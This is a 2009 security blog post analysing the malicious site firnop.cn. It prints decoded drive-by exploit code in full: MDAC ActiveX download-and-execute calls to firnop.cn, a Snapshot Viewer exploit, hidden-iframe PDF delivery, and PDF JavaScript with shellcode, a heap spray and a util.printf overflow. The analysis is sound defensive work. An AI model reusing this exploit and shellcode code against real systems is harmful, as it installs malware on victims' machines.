Blog for hpHosts, and whatever else I feel like writing about ....

Wednesday 7 January 2009

firnop.cn - MDAC + PDF + Snapshot viewer control exploits

I was asked to look at firnop.cn (IP: 195.24.78.242, PTR: B088.com) by Connie yesterday, due to it's containing some rather suspicious code. I was not to be disappointed.

As I told Connie, this one only allows access once per IP, after that, you get a lovely little 404. I thought this was only going to be a once per day job, but alas no, this is the second day and I still can't access the original code there now. Fear not, your clever blogger saved a copy of the original vURL result;

vURL Online - Results for firnop.cn
http://hosts-file.net/misc/firnop_cn/vURL_Online_-_firnop_cn.html

This shows some rather obscure code hidden once again in a form field, this time rosorur, which is then loaded dynamically courtesy of document.getElementById('rosorur').value. To decode this, we'll need two things;

1. Malzilla (malzilla.sourceforge.net)

Malzilla is my favourite tool for decoding obfuscased or encoded scripts, and has been since it's inception. If you're not using it already, and are working with malicious sites, give it a try.

2. Small change to the original code

The small change we need to make is to ditch the HTML, and move the content of the rosorur text box, to it's own variable. Once we've done this, we can simply change;

eval(document.getElementById('rosorur').value)

To;

eval(rosorur)

If we now run this through Malzilla, we're given the following results. The CLSID used in the code, is for the MSXML 4.0 component.

<object id=xmltarget classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5"></object>
<SCRIPT type='text/javascript'>
function errfuck()
{
  return true;
}
window.onerror=errfuck;
function dddec(str)
{
  cto="GsHkUqw1S2Kba0QPivRDnAyr9lJYm4TcF6IXo3Mx7BENtjCZpuf5gW8zVhLdeO";
  cfrom="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890";
  res="";
  for (i=0;i<str.length;i++)
  {
   c=str.charAt(i);
   pos=cto.indexOf(c);
   if (pos!=-1)
   res+=cfrom.charAt(pos);
   else
   res+=c;
  }
  return res;
}
function goMDAC()
{
  d8= 0;
  var Qy29Nd = document.createElement(dddec("SriHAU"));
  Qy29Nd.setAttribute("id",dddec("JqWefa"));
  Qy29Nd.setAttribute("classid",dddec("ARb1a:uMehZVVh-hVo8-ggMO-ed8o-OOZOzxZWem8h"));
  try
  {
   var LoWMFJ = Qy29Nd.CreateObject(dddec("KaSar.bUkHKl"),'');
   var d8 = 1;
  }
  catch(e)
  {
  }
  try
  {
   var PEELt6 = Qy29Nd.CreateObject(dddec("3PHRR.o22R1AKU1S9"),'');
   var d8 = 1;
  }
  catch(e)
  {
  }
  if(d8 == 1)
  {
   try
   {
    var JB7Ebp = Qy29Nd.CreateObject(dddec("lbnlRW.C5tBTTX"),'');
    JB7Ebp.open("GET","http://firnop.cn/getexe.php?h=11",false);
    JB7Ebp.send();
    LoWMFJ.type = 1;
    LoWMFJ.open();
    LoWMFJ.Write(JB7Ebp.responseBody);
    Frogxa = "..\\S87ekhV.exe";
    LoWMFJ.SaveToFile(Frogxa,2);
    eval(dddec("XmmtUh.3PHRRmnHAwUH(xkSQnK);"));
    //return 1;
   }
   catch(e)
   {
   }
  }
}
function goPDF()
{
  wnd=window;
  while (wnd.parent!=wnd)
  wnd=wnd.parent;
  wnd.location="getfile.php?f=vispdf";
}
function goSnap()
{
  var sfrom = 'http://firnop.cn/getexe.php?h=12';
  var fuckavo="SB";
  var x;
  var fuckavp="SB";
  var obj;
  var fuckavx="SB";
  var mycars = new Array();
  var fuckava="SB";
  mycars[0] = "c:/Program Files/Outlook Express/WAB.EXE";
  mycars[1] = "d:/Program Files/Outlook Express/WAB.EXE";
  mycars[2] = "e:/Program Files/Outlook Express/WAB.EXE";
  var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1");
  if(objlcx)
  {
   setTimeout('window.location = "ldap://"',3000);
   for (x in mycars)
   {
    obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1")
    var buf1 = sfrom;
    var fuckavg="SB";
    var buf2=mycars[x];
    var fuckavj="SB";
    obj.Zoom = 0;
    obj.ShowNavigationButtons = false;
    obj.AllowContextMenu = false;
    obj.SnapshotPath = buf1;
    try
    {
     obj.CompressedPath = buf2;
     obj.PrintSnapshot();
    }
    catch(e)
    {
    }
   }
  }
  var fuckavqgga="SB";
  var fuckavqggxa="SBd";
}
setTimeout('goMDAC();',3500);
setTimeout('goSnap();',1);
try
{
  var obj = null;
  obj = new ActiveXObject("AcroPDF.PDF");
  if (!obj)
  {
   obj = new ActiveXObject("PDF.PdfCtrl");
  }
  if (obj)
  {
   document.write("<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>");
   setTimeout('goPDF();',5000);
  }
}
catch(e)
{
  document.write("<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>");
  setTimeout('goPDF();',5000);
}
</script>


Unfortunately, the only ones I could actually download, were f=pdf and f=vispdf, so lets analyze those shall we? First of all, we need to uncompress them. For this we'll use pdftk.

Once the Javascript is dumped, we see a Base64 encoded string that is decoded courtesy of the following;

function func(str) {
""b64s=""ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"";
""while(str.substr(-1,1)==""="")str=str.substr(0,str.length-1);
""var b=str.split(""""), i
""var s=Array(), t
""var lPos = b.length - b.length % 4
""for(i=0;i<lPos;i+=4){
""""t=(b64s.indexOf(b[i])<<18)+(b64s.indexOf(b[i+1])<<12)+(b64s.indexOf(b[i+2])>>6)+b64s.indexOf(b[i+3])
""""s.push( ((t>>16)&0xff), ((t>>8)&0xff), (t&0xff) )
""}
""if( (b.length-lPos) == 2 ){ t=(b64s.indexOf(b[lPos])<<18)+(b64s.indexOf(b[lPos+1])<<12); s.push( ((t>>16)&0xff)); }
""if( (b.length-lPos) == 3 ){ t=(b64s.indexOf(b[lPos])<<18)+(b64s.indexOf(b[lPos+1])<<12)+(b64s.indexOf(b[lPos+2])<<6); s.push( ((t>>16)&0xff), ((t>>8)&0xff) ); }
""for( i=s.length-1; i>=0; i-- ){
""""if( s[i]>=168 ) s[i]=AZ.charAt(s[i]-163)
""""else s[i]=String.fromCharCode(s[i])
""};
""eval(s.join(""""))
}


If we then have Malzilla decode this, we're given yet another encoded script, that this time will need handled a little differently;

vikekide2=unescape("%u03eb%ueb59%ue805%ufff8%uffff%u494f%u4949%u4949%u5149%u565a%u5854%u3336%u5630%u3458%u3041%u3642%u4848%u4230%u3033%u4342%u5856%u4232%u4244%u3448%u3241%u4441%u4130%u5444%u4442%u4251%u4130%u4144%u5856%u5a34%u4238%u4a44%u4d4f%u4e4b%u5142%u554c%u544c%u3343%u4c49%u4648%u4b49%u334e%u5041%u4842%u5346%u304c%u4949%u4e44%u4f4c%u4e4b%u5045%u4e4a%u4e4b%u4f4f%u4f4f%u4f4f%u5742%u544e%u4949%u5949%u5949%u4c43%u4f4d%u334a%u4a49%u5949%u4949%u5949%u3144%u4d49%u3945%u4144%u4e49%u4845%u4346%u3144%u4d49%u3941%u3144%u5441%u3144%u4e4c%u4a45%u4144%u4e4d%u3847%u4e41%u394c%u564c%u3144%u4e47%u4b49%u594c%u5644%u5144%u4d47%u584d%u4a4c%u4746%u4c4f%u4c50%u4c4a%u5144%u4a48%u494c%u3644%u4144%u564b%u4f43%u3947%u4c42%u464c%u334f%u4e4d%u3941%u4c42%u4c48%u414c%u3550%u394d%u4d4e%u374b%u3742%u4c42%u4c48%u4c47%u5144%u5546%u3144%u4d4f%u4b4d%u594c%u554c%u544a%u574a%u594c%u354a%u4a4c%u4542%u4f4f%u4144%u4941%u3144%u4d4f%u5845%u494c%u454c%u554a%u474a%u394b%u494c%u354a%u3144%u5949%u394c%u554c%u3144%u3643%u5144%u4650%u514c%u454f%u4947%u4144%u3449%u4f43%u494d%u4c42%u3741%u4c49%u5949%u4949%u5949%u314c%u354f%u3946%u4c4b%u4c4f%u5648%u4c50%u4645%u4c43%u5144%u4441%u4f43%u394a%u4c42%u3741%u4a46%u3949%u4949%u3949%u514c%u454f%u484c%u4c4f%u4d4f%u3149%u4a47%u3149%u4e4e%u3643%u4149%u4a4f%u5149%u4c47%u514c%u5745%u4b49%u3144%u4445%u4f43%u4b49%u4c4c%u5648%u4c50%u3745%u3550%u394d%u494c%u4c45%u4f4a%u4b47%u4f4e%u5550%u4d4d%u394c%u494d%u4e41%u4f4e%u4949%u5949%u4a4c%u5549%u4c49%u4c49%u4c4c%u4c4f%u4c49%u5648%u4c50%u4645%u3144%u5445%u4c49%u4c4c%u3648%u4c50%u5649%u4c49%u3648%u4c50%u364d%u4a4c%u3549%u3345%u514e%u3549%u4e4e%u5642%u4c4a%u4c4b%u4c4f%u4c4c%u5648%u344b%u4c43%u4c42%u3344%u474b%u5747%u4a4c%u5549%u554c%u5741%u4b4f%u3648%u5648%u5648%u4d50%u4f4e%u4e4d%u4c49%u4e4b%u4f48%u4f4c%u4d4a%u4f4d%u4f4d%u4e4b%u4f4e%u4e4c%u4e4c%u3949%u4d50%u4f4e%u4e4d%u4c4c%u4e42%u4e4c%u4e4d%u4f4e%u4f46%u4d4d%u4f42%u4e4b%u4f4e%u4f4c%u4e4d%u4f48%u4e4b%u4e42%u4d4a%u3949%u4c50%u4f42%u4f47%u4d4e%u4e41%u4f4e%u4f4c%u5949%u4d4e%u4e41%u4f42%u4e4d%u4c4d%u4f41%u4e4b%u4f4e%u4f4a%u4f4d%u3949%u4d45%u4f48%u4f4a%u4f4d%u4d45%u4f42%u4f4b%u4e4b%u4f4a%u4e4b%u4e42%u4d4a%u4949%u4e4e%u4e4b%u4f45%u4f46%u4f48%u4f47%u5949%u4c4e%u4c4b%u4d45%u4d4d%u4f48%u4e50%u4f47%u4f45%u4f48%u4f4a%u4f4d%u4c4d%u4f48%u4d4f%u4f42%u4f45%u4f4e%u4d4a%u3949%u364a%u3746%u5746%u5742%u434c%u524f%u324f%u4648%u5649%u3744%u3650%u364f%u3742%u3250%u4643%u4650%u324f%u5647%u4645%u3746%u3645%u574a%u5645%u4250%u5742%u564a%u5742%u434f%u564a%u534d%u5343%u3341%u4842%u005a");var robedimup=unescape("%u0A0A%u0A0A");var tupari=20;var tosib=tupari+vikekide2.length;while(robedimup.length<tosib)robedimup+=robedimup;var vamuniveso=robedimup.substring(0,tosib);var sevusupo=robedimup.substring(0,robedimup.length-tosib);while(sevusupo.length+tosib<0x60000)sevusupo=sevusupo+sevusupo+vamuniveso;var bibale=new Array();for(lepefela6=0;lepefela6<1200;lepefela6++){bibale[lepefela6]=sevusupo+vikekide2}var rufirubed5=1299999999999999999988888888888888888888888888888888888888888888888888888888888888888
8888888888888888888888888888888888888888888888888888888888888888888888888888888888888
8888888888888888888888888888888888888888888888888888888888888888888888888888888888888
88888888888888888888888888888888888888888;util.printf("%45000f",rufirubed
5);


If we try having Malzilla actually decode this, Malzilla will freeze and crash, so instead, we'll have it convert the string to Hex, then save that. This gives us a new .bin file containing a hex dump. Loading this in Malzilla and using it's Shellcode Analyzer shows:



This shows us the executable coming from;

firnop.cn/getexe.php?h=32

MD5: E27BB8F8ADEB613305F5DE9A68C125DB

HTTP/1.1 200 OK
Date: Thu, 08 Jan 2009 10:16:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Length: 85504
Content-Disposition: attachment; filename=update.exe
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/octet-stream


Detection sadly, is rubbish;

http://www.virustotal.com/analisis/1fac7fccd549f08c83373ab686062b0c

Sandbox report will be added once it's finished (tried Anubis but for some reason, it failed with an "XML could not be found" error)

/edit 12-01-2009

Sadly, the sandboxes still haven't gotten back to me (submitted to Anubis and MS's sandboxes). However, I've just noticed on Honeyblogs feed that CWSandbox has this one (or a variant of it atleast as it's network activity shows firnop.cn), so that'll have to do;

https://cwsandbox.org/?page=report&analysisid=879663&password=vqtgp

No comments: